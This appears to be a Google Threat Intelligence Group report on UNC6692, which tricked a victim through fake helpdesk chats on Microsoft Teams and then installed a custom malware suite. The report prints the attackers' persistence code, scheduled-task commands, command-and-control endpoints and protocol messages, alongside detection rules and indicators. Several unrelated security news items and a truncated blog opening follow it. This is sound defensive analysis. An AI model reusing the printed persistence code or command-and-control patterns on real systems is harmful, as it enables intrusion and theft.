Reading view
Snow Flurries: How UNC6692 Employed Social Engineering to Deploy a Custom Malware Suite
Written by: JP Glab, Tufail Ahmed, Josh Kelley, Muhammad Umair
Introduction
Google Threat Intelligence Group (GTIG) identified a multistage intrusion campaign by a newly tracked threat group, UNC6692, that leveraged persistent social engineering, a custom modular malware suite, and deft pivoting inside the victim’s environment to achieve deep network penetration.
As with many other intrusions in recent years, UNC6692 relied heavily on impersonating IT helpdesk employees, convincing their victim to accept a Microsoft Teams chat invitation from an account outside their organization. The UNC6692 campaign demonstrates an interesting evolution in tactics, particularly the use of social engineering, custom malware, and a malicious browser extension, playing on the victim’s inherent trust in several different enterprise software providers.
Threat Details
In late December 2025, UNC6692 conducted a large email campaign designed to overwhelm the target with messages, creating a sense of urgency and distraction. Following this, the attacker sent a phishing message via Microsoft Teams, posing as helpdesk personnel offering assistance with the email volume.
Infection Chain
The victim was contacted through Microsoft Teams and was prompted to click a link to install a local patch that prevents email spamming. Once clicked, the user’s browser opened an HTML page and ultimately downloaded a renamed AutoHotKey binary and an AutoHotkey script, sharing the same name, from a threat actor-controlled AWS S3 bucket.
"url": "https://service-page-25144-30466-outlook.s3.us-west-2.amazonaws.com/update.html?email=<redacted>.com",
"description": "Microsoft Spam Filter Updates | Install the local patch to protect your account from email spamming",
Figure 1: Snippet from MS Team Logs
If the AutoHotkey binary is named the same as a script file in its current directory, AutoHotkey will automatically run the script with no additional command line arguments. Evidence of AutoHotKey execution was recorded immediately following the downloads resulting in initial reconnaissance commands and the installation of SNOWBELT, a malicious Chromium browser extension (not distributed through the Chrome Web Store). Mandiant was unable to recover the initial AutoHotKey script.
The persistence of SNOWBELT was established in multiple ways. First, a shortcut to an AutoHotKey script was added to the Windows Startup folder, which verified SNOWBELT was running and that a Scheduled Task was present.
if !CheckHeadlessEdge(){
try{
taskService:=ComObject("Schedule.Service")
taskService.Connect()
rootFolder:=taskService.GetFolder("\")
if FindAndRunTask(rootFolder){
Sleep 10000
if CheckHeadlessEdge(){
ExitApp
}
}
}
Run 'cmd /c start "" "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --user-data-dir="%LOCALAPPDATA%\Microsoft\Edge\System Data" --headless=new --load-extension="%LOCALAPPDATA%\Microsoft\Edge\Extension Data\SysEvents" --no-first-run',,"Hide"
}
ExitApp
Figure 2: Snippet from AutoHotKey script to verify SNOWBELT was running and to start it if not
Second, two additional scheduled tasks were installed. One task to start a windowless Microsoft Edge process that loads the SNOWBELT extension and another to identify and terminate Microsoft Edge processes that do not have CoreUIComponents.dll loaded.
<Exec>
<Command>
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"
</Command>
<Arguments>
--user-data-dir="C:\Users\<redacted>\AppData\Local\Microsoft\Edge\System Data"
--no-first-run
--load-extension="C:\Users\<redacted>\AppData\Local\Microsoft\Edge\Extension Data\SysEvents"
--headless=new --disable-sync
</Arguments>
</Exec>
Figure 3: Snippet from the scheduled task to start the SNOWBELT extension windowless Microsoft Edge
Microsoft Edge processes without CoreUIComponents.dll are typically headless. The threat actor uses this command to essentially “clean up” headless Edge processes that execute their malware.
<Exec>
<Command>cmd</Command>
<Arguments>
/c "for /f "tokens=2" %p in ('tasklist /M SHELL32.dll ^| findstr "msedge.exe"') do @(tasklist /M CoreUIComponents.dll | findstr "%p" >nul || taskkill /F /PID %p)"
</Arguments>
</Exec>
Figure 4: Snippet from the scheduled task to check for CoreUIComponents.dll
Using the SNOWBELT extension, UNC6692 downloaded additional files including SNOWGLAZE, SNOWBASIN, AutoHotkey scripts, and a ZIP archive containing a portable Python executable and required libraries.
Internal Recon and Lateral Movement
After gaining initial access, process execution telemetry recorded UNC6692 using a Python script to scan the local network for ports 135, 445, and 3389. Following internal port scanning, the threat actor established a Sysinternals PsExec session to the victims system via the SNOWGLAZE tunnel, and executed commands to enumerate local administrator accounts. Using the local administrator account, the threat actor initiated an RDP session via the SNOWGLAZE tunnel from the victim system to a backup server. Though not directly observed, the threat actor may have acquired the local administrator accounts credentials via multiple attack paths such as authenticated Server Message Block (SMB) share enumeration.
Escalate Privileges
After gaining access to the backup server the threat actor utilized the local administrator account to extract the system's LSASS process memory with Windows Task Manager. Microsoft Windows Local Security Authority Subsystem Service (LSASS) process lsass.exe enforces security policy and contains usernames, passwords and hashes for accounts that have accessed the system. After extracting the process memory, UNC6692 exfiltrated it via LimeWire. With the process memory out of the victim environment UNC6692 is able to use offensive security tools to extract the credentials while not having to worry about being detected.
Complete Mission
Now armed with the password hashes of elevated users, UNC6692 used Pass-The-Hash to move laterally to the network's domain controllers. Pass-The-Hash is a common technique used by threat actors where the NTLM hash is passed to another system, instead of providing the account password, allowing for authentication via NTLM. Once authenticated to the Domain Controller, the threat actor opened Microsoft Edge, and downloaded a ZIP archive containing FTK Imager to the Domain Administrator’s \Downloads folder. The threat actor executed FTK Imager and mounted the local storage drive. Subsequently, FTK Imager wrote the Active Directory database file (NTDS.dit), Security Account Manager (SAM) , SYSTEM, and SECURITY registry hives to the \Downloads folder. The extracted files were then exfiltrated from the network via LimeWire. Finally, EDR telemetry logged the threat actor performing screen captures on the Domain Controllers, specifically targeting in-focus instances of Microsoft Edge and FTK Imager.
Figure 5: UNC6692 attack lifecycle
THE SNOW Ecosystem
Phishing Landing Page
The original phishing link (https://service-page-25144-30466-outlook.s3.us-west-2.amazonaws.com/update.html?email=<redacted>.com) delivered via Microsoft Teams directs the victim to a landing page masquerading as a "Mailbox Repair Utility." This interface is designed to elicit user engagement through various on-screen buttons.
Figure 6: The landing page masquerading as an official "Mailbox Repair and Sync Utility v2.1.5."
Phase 1: Environment Enforcement and Anti-Analysis
The attacker used a gatekeeper script designed to ensure the payload is delivered only to intended targets while evading automated security sandboxes. Upon loading, the landing page executes an init() function that inspects the URL for a mandatory ?email= parameter. If this parameter is absent, the page immediately redirects to about:blank.
The script also checks the victim’s browser. If the user is not using Microsoft Edge, the page displays a persistent overlay warning. This forces the user to click an "Open in Edge" button, which triggers the microsoft-edge: URI scheme. This ensures the victim is moved from potentially secure mobile or third-party browser environments into a specific workspace where the attacker’s exploits are most effective.
Phase 2: Credential Harvesting via Social Engineering
Once the environment is established, the page presents a professional-looking "Configuration Management Panel" masquerading as an official "Mailbox Repair and Sync Utility." The primary hook is a "Health Check" button that, when clicked, triggers an "Authentication Required" modal.
The harvesting script, handleAuthFormSubmit, employs a "double-entry" psychological trick. It is programmed to reject the first and second password attempt as incorrect. This serves two functions: it reinforces the user’s belief that the system is legitimate and performs real-time validation, and it ensures that the attacker captures the password twice, significantly reducing the risk of a typo in the stolen data. A screenshot of authentication is shown in Figure 7, and the email supplied is entered by default.
Figure 7: The credential harvesting prompt triggered by the "Health Check" button
Phase 3: Data Exfiltration and Distraction Sequences
Upon successful submission, the script executes an asynchronous PUT request using AWS URLs. The validated credentials and metadata are uploaded directly to an attacker-controlled Amazon S3 bucket (e.g., service-page-18968-2419-outlook.s3.us-west-2.amazonaws.com), which have since been taken down. These buckets serve as the command and control (C2) infrastructure and represent critical indicators of compromise (IOCs).
To mask this background activity and prevent user suspicion, the script initiates a startProgressBar function. This displays a scripted distraction sequence featuring fake technical tasks such as "Parsing configuration data" and "Checking mailbox integrity." This manipulation keeps the victim engaged until the data transfer is complete.
Figure 8: A scripted distraction sequence used to mask the background exfiltration of stolen data
Phase 4: Malware Staging and Endpoint Foothold
The final stage involves the delivery of secondary malicious payloads referenced within the CONFIG object of the script. While the progress bar runs, the site is prepared to deliver files seen in Table 1.
|
Button Clicked |
File Downloaded |
Type / Risk |
|
Profile 1.3 |
Protected.ahk |
AutoHotKey Script: Not found during the investigation, but suspected to install SNOWBELT. |
|
Profile B5 |
profileB5.txt |
Likely a configuration file for the malware. |
|
Component Verification |
RegSrvc.exe |
AutoHotKey Executable: Masquerading as a "Registration Service." |
|
Health Check |
N/A |
Prompts the user to input email credentials. Exfiltrates the credentials to Amazon S3 bucket. |
By the time the user receives a "Configuration completed successfully" message, the attacker has secured the credentials and potentially established a persistent foothold on the endpoint using these staged files.
The SNOW malware ecosystem, attributed to the threat cluster UNC6692, operates as a modular ecosystem comprising three primary components: SNOWBELT, SNOWGLAZE, and SNOWBASIN. Rather than functioning as isolated tools, these components form a coordinated pipeline that facilitates an attacker's journey from initial browser-based access to the internal network of the organization.
Figure 9: The SNOW ecosystem
1.SNOWBELT (Browser Extension)
SNOWBELT serves as the initial foothold and the primary "eyes" of the operation. It is a JavaScript-based backdoor delivered as a Chromium browser extension, often masquerading under names like "MS Heartbeat" or "System Heartbeat". Rather than being available through the Chrome Web Store, the extension is deployed through social engineering tactics.
-
Role: It is designed to intercept commands and send them to SNOWBASIN for execution . It maintains persistence via the browser's extension registration system and uses Service Worker Alarms and Keep-Alive Tab Injection (via helper.html) to ensure it remains active whenever the browser is running.
-
Functionality: By relaying commands from the threat actor to SNOWBASIN, SNOWBELT provides authenticated access to the environment. This allows the attacker to move laterally and escalate privileges without the need for constant re-authentication.
2.SNOWGLAZE (Python Tunneler)
Once a foothold is established, SNOWGLAZE is deployed to manage the logistics of external communication. SNOWGLAZE is a Python-based tunneler that can operate in both Windows and Linux environments.
-
Role: Its primary function is to create a secure, authenticated WebSocket tunnel between the victim's internal network and the attacker's command-and-control (C2) infrastructure, such as a Heroku subdomain. It facilitates SOCKS proxy operations, allowing arbitrary TCP traffic to be routed through the infected host.
-
Functionality: SNOWGLAZE masks malicious traffic by wrapping data in JSON objects and Base64 encoding it for transfer via WebSockets. This makes the activity appear as standard encrypted web traffic. When attackers wish to interact with backdoors like SNOWBASIN or exfiltrate staged data, traffic is routed through this established tunnel.
3.SNOWBASIN (Python Bindshell)
While SNOWBELT monitors the user and SNOWGLAZE bridges the network gap, SNOWBASIN provides the functional interactive control over the infected system.
-
Role: It acts as a persistent backdoor that operates as a local HTTP server (typically listening on port 8000). It enables remote command execution via cmd.exe or powershell.exe, screenshot capture, and data staging for exfiltration.
-
Functionality: This component is where active reconnaissance and mission completion occur. Attacker commands (such as whoami or net user) are sent through the SNOWGLAZE tunnel, intercepted by the SNOWBELT extension, and then proxied to the SNOWBASIN local server via HTTP POST requests. SNOWBASIN executes these commands and relays the results back through the same pipeline to the attacker.
Malware Analysis
SNOWBELT
SNOWBELT is a JavaScript-based backdoor implemented as a Chromium browser extension. Its lifecycle begins with the execution of the background.js Service Worker upon installation, which leverages the browser's extension registration system for persistence. To ensure continuous operation while the browser is active, the malware utilizes Service Worker Alarms (agent-heartbeat) and Keep-Alive Tab Injection (helper.html).
Upon initialization, the malware generates a unique identity using the prefix fp-sw- followed by a UUID. It then employs a time-based DGA to calculate C2 URLs. Using a hard-coded seed value (691f7258f212fa8908a8bf06bcf9e027d2177276e13e10ff56bd434ff3755cc4), it generates a registry URL for an S3 bucket within 30-minute time slots. These URLs follow a specific structural pattern:
https://[a-f0-9]{24}-[0-9]{6,7}-{0-9}{1}.s3.us-east-2.amazonaws[.]com
The manifest retrieved from this registry is decrypted via AES-GCM using a key derived from SHA256(SEED + "|" + timeslot).
For low-latency C2, SNOWBELT registers with the browser's Push Notification service. This is achieved using a hard-coded VAPID Public Key:
BJkWCT45mL0uvV3AssRaq9Gn7iE2N7Lx38ZmWDFCjwhz0zv0QSVhKuZBLTTgAijB12cgzMzqyiJZr5tokRzSJu0This setup provides an asynchronous channel that allows attackers to "wake up" the Service Worker immediately via authenticated Push messages, bypassing standard polling. Additionally, the malware supports real-time interaction through a persistent REGISTRY_WEBSOCKET_URL connection.
SNOWBELT functions in coordination with SNOWBASIN, a backdoor acting as a local web server (typically on port 8000). It relays decrypted C2 commands—such as command, buffer, flush, and commit—to SNOWBASIN via HTTP POST requests, effectively proxying shell commands to the host system.
The malware also includes mechanisms to bypass the browser sandbox:
-
Native Host Bridge (open_native_messaging): Uses chrome.runtime.connectNative to establish I/O pipes with local applications for issuing privileged commands.
-
Protocol Handler Abuse (open_uri): Employs dream.html and dream.js to trigger custom URI schemes in new tabs, targeting vulnerabilities in third-party desktop applications.
Exfiltration is managed by the sendJsonDataToS3 function, which encrypts data with AES-GCM (Key: SHA256(SEED + "|ping|" + bucket + "|" + objectKey)) before uploading to S3. The backdoor's command set is summarized in Table 2.
|
Command Type |
Description |
|---|---|
|
command |
Relayed: Decrypts and POSTs command text to SNOWBASIN; exfiltrates response to C2. |
|
buffer |
Relayed: Forwards file path payloads to local buffer endpoint. |
|
flush |
Relayed: Triggers a data flush on the local server. |
|
commit |
Relayed: Sends URL and path data for local processing. |
|
stop_server |
Relayed: Shutdown signal for the local SNOWBASIN instance. |
|
screenshot |
Relayed: Requests a screen capture from the host. |
|
payload |
Internal: Downloads files using chrome.downloads; supports URLs and base64 blobs. |
|
open_native_messaging |
Internal: Direct connection to native host apps via Chrome APIs. |
|
open_uri |
Internal: Triggers external protocol handlers via helper pages. |
|
delete_cache |
Internal: Removes downloaded files from the system. |
|
websocket_control |
Internal: Controls the state of WebSocket connectivity. |
|
ping |
Internal: Provides heartbeats and status updates to the C2. |
Finally, SNOWBELT implements a feedback loop by monitoring chrome.downloads.onChanged. If a download is blocked (e.g., FILE_VIRUS_INFECTED), the malware reports the error back to the S3-based C2.
SNOWBASIN
SNOWBASIN is a Python-based backdoor that operates as a local HTTP server on ports 8000, 8001, or 8002. Its core capabilities include command execution, screenshot capture, and data exfiltration. The malware also enables operators to manage files by downloading or deleting them, and it provides the capability to terminate active connections. SNOWBELT relays commands to this malware by sending HTTP requests to localhost:8000.
It turns the victim's computer into a command-and-control (C2) node that can be controlled via HTTP requests. It is designed to run on Windows (evidenced by os.chdir('C:\\') and cmd.exe calls) and allows a remote actor to execute commands, steal files, and take screenshots.
|
Endpoint |
Function |
Description |
|---|---|---|
|
/stream |
Remote Shell |
Receives a command and executes it via cmd.exe or powershell.exe. It returns the STDOUT/STDERR results to the attacker. |
|
/buffer |
File Exfiltration |
If a file path is provided, it reads the file, encodes it in Base64, and sends it back. If a folder is provided, it returns a full directory listing |
|
/flush |
File Deletion |
Relayed. Signals http://localhost[:]8000/flush to flush buffered data. |
|
/commit |
File Ingress |
Downloads a file from a provided URL and saves it to a specific path on the local disk. It bypasses SSL certificate verification (CERT_NONE). |
|
/capture |
Take Screenshots |
Uses the mss and PIL libraries to take a screenshot of all monitors and send the image back as a Base64 string. |
|
/gc |
Self-Termination |
Shuts down the server instance, effectively ""killing"" the backdoor's connection. |
SNOWGLAZE
The network tunneler SNOWGLAZE, developed in Python, facilitates the routing of arbitrary TCP traffic through a compromised system by establishing a WebSocket connection to a static C2 host using hard-coded credentials.
The script is designed for cross-platform execution on both Windows and Linux, utilizing environment-specific behaviors for each. In Windows environments, it runs as a foreground process manageable via standard keyboard interrupts (Ctrl-C). Conversely, on Linux, it operates as a background daemon and includes specific logic to handle SIGINT and SIGTERM signals for orderly shutdowns.
To establish communication, the malware targets the C2 server at wss://sad4w7h913-b4a57f9c36eb[.]herokuapp[.]com:443/ws, masquerading its traffic with a Microsoft Edge User-Agent string. If the initial connection fails, the script employs an incremental backoff strategy, starting at 5 seconds and increasing by 5-second intervals up to a 300-second maximum. Upon a successful WebSocket handshake, it transmits the following Auth payload:
{
"type": "auth",
"login": "<redacted",
"password": "<redacted",
"uuid": "<redacted>"
}Following authentication, the script sends a "register" type message with no payload, followed by an "agent_info" JSON record. Although the "info" field within this record is intended to carry the public IP address, it remains unpopulated due to improper implementation in the script.
Once fully connected, the malware listens for JSON-formatted commands. The supported "type" values include:
-
ping
-
Prompts the script to return a "type": "pong" JSON object.
-
agent_public_ip
-
Intended to report the host's public IP via an agent_info structure; however, the IP field is consistently blank in current versions.
-
socks_connect
-
Requests a new SOCKS proxy connection using a unique conn_id provided by the operator to track the session. The request format is as follows:
{
"type": "socks_connect",
"conn_id": "<unique_connection_id>",
"target_host": "example.com",
"target_port": 80
}-
-
Execution triggers an asynchronous worker thread that manages the TCP-to-WebSocket data transfer, utilizing Base64 encoding and JSON encapsulation with the socks_data type.
-
-
socks_data
-
Facilitates bidirectional data exchange between the WebSocket and the TCP socket. Data is Base64-encoded within the data field of the following structure:
-
{
"type": "socks_data",
"conn_id": "<unique_connection_id>",
"data": "bG9yZW0gaXBzdW0="
}-
socks_close
-
Terminates the specific proxy stream identified by the given conn_id.
-
disconnect
-
Serves all active proxy connections and terminates script execution.
Outlook & Implications
The UNC6692 campaign demonstrates how modern attackers blend social engineering and technical evasion to gain a foothold into environments. A critical element of this strategy is the systematic abuse of legitimate cloud services for payload delivery and exfiltration, and for command-and-control (C2) infrastructure. By hosting malicious components on trusted cloud platforms, attackers can often bypass traditional network reputation filters and blend into the high volume of legitimate cloud traffic.
This "living off the cloud" strategy allows attackers to blend malicious operations into a high volume of encrypted, reputably sourced traffic, making detection based on domain reputation or IP blocking increasingly ineffective. Defenders must now look beyond process monitoring to gain clear visibility into browser activity and unauthorized cloud traffic. As threat actors continue to professionalize these modular, cross-platform methodologies, the ability to correlate disparate events across the browser, local Python environments, and cloud egress points will be critical for early detection.
Indicators of Compromise (IOCs)
To assist the wider community in hunting and identifying the activity outlined in this blog post, we have included IOCs in a free GTI Collection for registered users.
Network Indicators
|
Indicator |
Description |
|
|
Hosted the phishing site and initial AutoHotKey payloads |
|
|
SNOWBELT C2 |
|
|
Hard-coded WebSocket Secure URL within SNOWGLAZE |
|
|
Domain for URL used to upload a text file |
File Indicators
|
File Name |
Description |
SHA-256 Hash |
|
C:\ProgramData\log |
SNOWGLAZE |
|
|
C:\ProgramData\log |
SNOWBASIN |
|
|
C:\Users\<user>\AppData\Local\Microsoft\Edge\Extension Data\SysEvents\background.js |
SNOWBELT Service worker |
|
|
C:\Users\<user>\AppData\Local\Microsoft\Edge\Extension Data\SysEvents\dream.js |
SNOWBELT JS resource |
|
|
C:\Users\<user>\AppData\Local\Microsoft\Edge\Extension Data\SysEvents\dream.html |
SNOWBELT HTML resource |
|
|
C:\Users\<user>\AppData\Local\Microsoft\Edge\Extension Data\SysEvents\helper.html |
SNOWBELT HTML resource |
|
YARA Rules
SNOWGLAZE
rule G_Tunneler_SNOWGLAZE_1 {
meta:
author = "Google Threat Intelligence Group (GTIG)"
platforms = "Windows, Linux"
strings:
$r1 = /\.connect\(\s{0,25}WS_PROXY_URL/
$r2 = /"data":\s{0,1}base64\.b64encode\(\w{1,10}\)\.decode\('ascii'\)/
$r3 = /"type":\s{0,1}"socks_data"/
$r4 = /await\s{0,1}reader\.read\(\d{2,4}\)/
$r5 = /"login":\s{0,1}AGENT_LOGIN/
$r6 = /"password":\s{0,1}AGENT_PASSWORD/
$r7 = /"uuid":\s{0,1}AGENT_UUID/
$s1 = ".socks_tcp_to_ws"
condition:
5 of ($r*)
and $s1
}SNOWBELT
rule G_Backdoor_SNOWBELT_1 {
meta:
author = "Google Threat Intelligence Group (GTIG)"
platform = "Windows"
strings:
$str1 = ".importKey(\"raw\",keyMaterial,\"AES-GCM\",!1,[\"decrypt\"])"
$str2 = ".importKey(\"raw\",keyMaterial,\"AES-GCM\",!1,[\"encrypt\"])"
$str3 = "sendJsonDataToS3"
$str4 = "processCommand"
$str5 = "\"screenshot\"===cmdType"
$str6 = "\"payload\"===cmdType"
$str7 = "\"websocket_control\"===cmdType"
$str8 = "\"open_uri\"===cmdType"
$str9 = "\"delete_cache\"===cmdType"
$str10 = "\"payload_download_complete\""
$str11 = ".s3.us-east-2.amazonaws.com/"
condition:
all of them
}SNOWBASIN
rule G_Backdoor_SNOWBASIN_1 {
meta:
author = "Google Threat Intelligence Group (GTIG)"
platform = "Windows"
strings:
$path1 = "self.path == '/probe':"
$path2 = "self.path == '/stream':"
$path3 = "self.path == '/buffer':"
$path4 = "self.path == '/flush':"
$path5 = "self.path == '/commit':"
$path6 = "self.path == '/capture':"
$path7 = "self.path == '/gc':"
$func1 = "self.handle_stream("
$func2 = "self.handle_buffer("
$func3 = "self.handle_flush("
$func4 = "self.handle_commit("
$s1 = "self.wfile.write(info_msg"
$s2 = "selected_port), WebServerHandler) as httpd:"
$s3 = "ThreadedTCPServer(socketserver.ThreadingMixIn"
$s4 = "httpd.serve_forever()"
condition:
filesize<1MB and (
(all of ($s*) and 6 of ($path*, $func*)) or
(8 of ($path*, $func*)) or
10 of them
)
}MITRE ATT&CK
|
Tactic |
Techniques |
|---|---|
|
Initial Access |
T1566.002: Spearphishing Link |
|
Execution |
T1053: Scheduled Task/Job T1053.005: Scheduled Task T1059: Command and Scripting Interpreter T1059.001: PowerShell T1059.003: Windows Command Shell T1059.006: Python T1059.007: JavaScript T1059.010: AutoHotKey & AutoIT T1204.001: Malicious Link T1204.002: Malicious File T1559: Inter-Process Communication T1569.002: Service Execution |
|
Persistence |
T1176.001: Browser Extensions T1543: Create or Modify System Process T1543.003: Windows Service T1547.001: Registry Run Keys / Startup Folder T1547.009: Shortcut Modification |
|
Privilege Escalation |
T1068: Exploitation for Privilege Escalation |
|
Defense Evasion |
T1027: Obfuscated Files or Information T1027.010: Command Obfuscation T1027.015: Compression T1036.005: Match Legitimate Resource Name or Location T1055: Process Injection T1070.004: File Deletion T1112: Modify Registry T1134: Access Token Manipulation T1134.001: Token Impersonation/Theft T1140: Deobfuscate/Decode Files or Information T1202: Indirect Command Execution T1562.001: Disable or Modify Tools T1564.001: Hidden Files and Directories T1622: Debugger Evasion |
|
Credential Access |
T1003.001: LSASS Memory T1003.002: Security Account Manager T1003.003: NTDS T1110.001: Password Guessing T1110.003: Password Spraying T1552.001: Credentials In Files |
|
Discovery |
T1007: System Service Discovery T1012: Query Registry T1016: System Network Configuration Discovery T1018: Remote System Discovery T1033: System Owner/User Discovery T1046: Network Service Discovery T1057: Process Discovery T1082: System Information Discovery T1083: File and Directory Discovery T1087.001: Local Account T1518: Software Discovery |
|
Lateral Movement |
T1021.001: Remote Desktop Protocol T1021.002: SMB/Windows Admin Shares |
|
Collection |
T1005: Data from Local System T1074: Data Staged T1113: Screen Capture T1560: Archive Collected Data T1560.001: Archive via Utility |
|
Exfiltration |
T1020: Automated Exfiltration T1567: Exfiltration Over Web Service T1567.002: Exfiltration to Cloud Storage |
|
Command and Control |
T1071.001: Web Protocols T1090: Proxy T1105: Ingress Tool Transfer T1572: Protocol Tunneling |
|
Impact |
T1489: Service Stop |
|
Resource Development |
T1608.002: Upload Tool T1608.005: Link Target |
Acknowledgements
This analysis would not have been possible without the assistance from several individuals within Mandiant Consulting, Google Threat Intelligence Group and FLARE who helped with analysis and reviewing this blog post. We also appreciate Amazon for their collaboration against this threat.
Chinese Cybersecurity Firm’s AI Hacking Claims Draw Comparisons to Claude Mythos
360 Digital Security Group claims to have uncovered 1,000 vulnerabilities using AI, including at the Tianfu Cup hacking contest.
The post Chinese Cybersecurity Firm’s AI Hacking Claims Draw Comparisons to Claude Mythos appeared first on SecurityWeek.
AI Can Autonomously Hack Cloud Systems With Minimal Oversight: Researchers
Palo Alto Networks has developed Zealot, a multi-agent penetration testing PoC capable of reconnaissance, exploitation, and exfiltration.
The post AI Can Autonomously Hack Cloud Systems With Minimal Oversight: Researchers appeared first on SecurityWeek.
From Access Control to Outcome Control: Securing AI Agents with Check Point and Google Cloud

AI is changing how software works. Applications no longer just process requests. They reason, make decisions, and take action. AI agents now retrieve data, invoke tools, and execute workflows across systems in real time. That shift introduces a new kind of risk. Because in an agentic world, security is no longer just about who has access. It’s about what AI is allowed to do. A new control point for agentic systems in Google Cloud Google Cloud’s Gemini Enterprise Agent Platform provides a centralized control point for agentic systems enabling identity, access, policy enforcement, and observability across how agents operate. This […]
The post From Access Control to Outcome Control: Securing AI Agents with Check Point and Google Cloud appeared first on Check Point Blog.
AI Finds Every Gap: How Many Can Your Network Survive?

Anthropic’s reported development of Claude Mythos signals a shift: AI is compressing attack timelines by accelerating vulnerability discovery, exploit development, and multi-step attack planning. More broadly, AI is increasing the speed and scale of attacks across malware, phishing, and vulnerabilities. Attackers can now run these vectors in parallel, reducing time to compromise and increasing exposure. AI also enables more targeted phishing, faster malware iteration, and rapid vulnerability discovery, exposing gaps in detection and exposure management earlier and requiring prevention-first controls and real-time detection. To see how these challenges translate into real-world performance, and how leading security vendors handle them under […]
The post AI Finds Every Gap: How Many Can Your Network Survive? appeared first on Check Point Blog.
National Vulnerability Database (NVD) Shifts to Selective Enrichment as CVE Volume Surges
Blog
National Vulnerability Database (NVD) Shifts to Selective Enrichment as CVE Volume Surges
In this post, we examine what NVD’s shift to selective enrichment means for vulnerability workflows and how security teams can maintain visibility and prioritization at scale.

The National Vulnerability Database (NVD) is changing how it processes and enriches vulnerability data in response to sustained growth in CVE submissions.
Under a new model announced by the National Institute of Standards and Technology, NVD will no longer enrich every CVE. Instead, enrichment efforts will focus on a defined subset, including vulnerabilities in the CISA KEV catalog, software used by the federal government, and software designated as critical.
All other CVEs will remain in the database without additional context unless specifically requested.
Rising disclosure volumes are placing pressure on public vulnerability infrastructure, and it has direct implications for how security teams consume and act on vulnerability data.
What Changed in NVD’s Operating Model
For years, NVD aimed to provide consistent enrichment across all CVEs, including severity scoring, affected product data, and supporting context for prioritization.
That approach has not been sustainable since late 2023.
In 2025, Flashpoint tracked 44,509 disclosed vulnerabilities, 14,593 of which had publicly available exploits (and 1,944 more with proof-of-concepts).
CVE submissions increased by 263% between 2020 and 2025, with 2026 already tracking higher year-over-year. Even with increased throughput, NVD has not been able to keep pace.
Under the updated model:
- CVEs meeting prioritization criteria will be enriched on an accelerated timeline
- CVEs outside those criteria will be labeled and left without enrichment
- Re-analysis of modified CVEs will occur selectively
- Separate NVD severity scoring will no longer be applied by default
This introduces a significant structural change in how vulnerability data is published and maintained.
The Impact on Vulnerability Workflows
Many security programs rely on NVD enrichment to operationalize CVE data. That enrichment provides the context needed to evaluate risk and determine remediation priorities.
With enrichment applied selectively, teams will encounter a growing number of CVEs that include:
- Limited or no severity scoring
- Incomplete product and version data
- Minimal context on exploitability or impact
- No CPE strings that allow for programmatic consumption of data
At the same time, disclosure volume continues to rise, and exploitation timelines remain compressed. This creates a gap between what is disclosed and what can be acted on efficiently.
Security teams will need to account for:
- Larger backlogs of CVEs without actionable context
- Increased manual effort to evaluate relevance and risk
- Greater variability in data quality across sources
These changes affect vulnerability management, threat intelligence, and security operations workflows simultaneously.
Prioritization Criteria Will Not Capture the Full Risk Landscape
NVD’s updated model focuses enrichment on a defined set of criteria, including known exploited vulnerabilities and software relevant to federal systems.
These categories represent important segments of risk, but they do not encompass the full set of vulnerabilities that organizations encounter in practice.
Modern environments include:
- Open-source dependencies
- SaaS platforms and APIs
- Cloud infrastructure and services
- Third-party and partner integrations
Many vulnerabilities affecting these environments fall outside formal prioritization frameworks or lack immediate classification within public datasets. As a result, security teams will continue to face exposure from vulnerabilities that are:
- Actively exploited but not yet included in prioritized lists
- Missing complete metadata or enrichment
- Relevant to their environment but not captured by federal-centric criteria
Vulnerability Intelligence Requires Broader Coverage and Deeper Context
As public enrichment becomes more selective, organizations will rely more heavily on alternative sources to maintain visibility and context.
Effective vulnerability intelligence requires:
- Coverage across CVE and non-CVE vulnerabilities
- Continuous tracking of exploitation activity and adversary usage
- Context on exploit maturity, and remediation
- Consistent enrichment that can be integrated into operational workflows
This level of detail supports faster and more accurate decision-making in environments where both volume and speed are increasing.
Flashpoint’s vulnerability intelligence model is built to address these requirements, with a dataset that includes over 7,000 known exploited vulnerabilities and ongoing analyst-driven enrichment across global sources.
What Security Teams Should Do Next
This shift in NVD operations does not change the need to track CVEs. It changes how that data can be used. Security teams should evaluate how their current workflows depend on:
- NVD enrichment for prioritization
- CVSS scoring as a primary decision input
- Completeness of public vulnerability data
From there, teams can take steps to strengthen resilience:
- Incorporate sources of vulnerability intelligence that cover CVE and more
- Align prioritization to exploitation activity and environmental relevance
- Validate coverage across software, cloud, and third-party dependencies
- Ensure that enrichment gaps do not delay remediation decisions
A Structural Shift in Vulnerability Data
For many teams, NVD has been a default source of vulnerability context. This change makes clear that its role is narrowing at a time when disclosure volume and prioritization demands are increasing.
At the same time, the role of vulnerability intelligence is expanding.
Security teams need access to data that supports prioritization, not just identification. They need consistent enrichment, faster turnaround, broader coverage, and context tied to real-world activity. As disclosure volumes continue to grow, those requirements become more central to how organizations manage risk.
Flashpoint’s Vulnerability Intelligence provides this level of coverage and context, with analyst-driven enrichment, global visibility across CVE and non-CVE vulnerabilities, and a dataset that includes over 7,000 known exploited vulnerabilities.
Request a demo to see how Flashpoint helps security teams prioritize and act on vulnerability risk with greater precision and confidence.
Begin your free trial today.
The post National Vulnerability Database (NVD) Shifts to Selective Enrichment as CVE Volume Surges appeared first on Flashpoint.
Defending Your Enterprise When AI Models Can Find Vulnerabilities Faster Than Ever
Introduction
Advances in AI model-powered exploitation have demonstrated that general-purpose AI models can excel at vulnerability discovery, even without being purpose-built for the task. Eventually, capabilities such as these will be integrated directly into the development cycle, and code will be more difficult to exploit than ever; however, this transition creates a critical window of risk. As we harden existing software with AI, threat actors will use it to discover and exploit novel vulnerabilities.
Faced with this scenario, defenders have two critical tasks: hardening the software we use as rapidly as possible, and preparing to defend systems that have not yet been hardened.
As noted in Wiz’s blog post, Claude Mythos: Preparing for a World Where AI Finds and Exploits Vulnerabilities Faster Than Ever, now is the time to strengthen playbooks, reduce exposure, and incorporate AI into security programs. The following blog provides an overview of the evolving attack lifecycle, how threat actors will weaponize these capabilities, and a roadmap for modernizing enterprise defensive strategies.
- aside_block
- <ListValue: [StructValue([('title', 'Webinar: Defending Your Enterprise When AI Models Can Find Vulnerabilities Faster Than Ever'), ('body', <wagtail.rich_text.RichText object at 0x7f65bba10fd0>), ('btn_text', 'Register now'), ('href', 'https://www.brighttalk.com/webcast/18282/666651?utm_source=gcs-blog&utm_medium=blog&utm_campaign=mythos'), ('image', None)])]>
Exploits in the Adversary Lifecycle
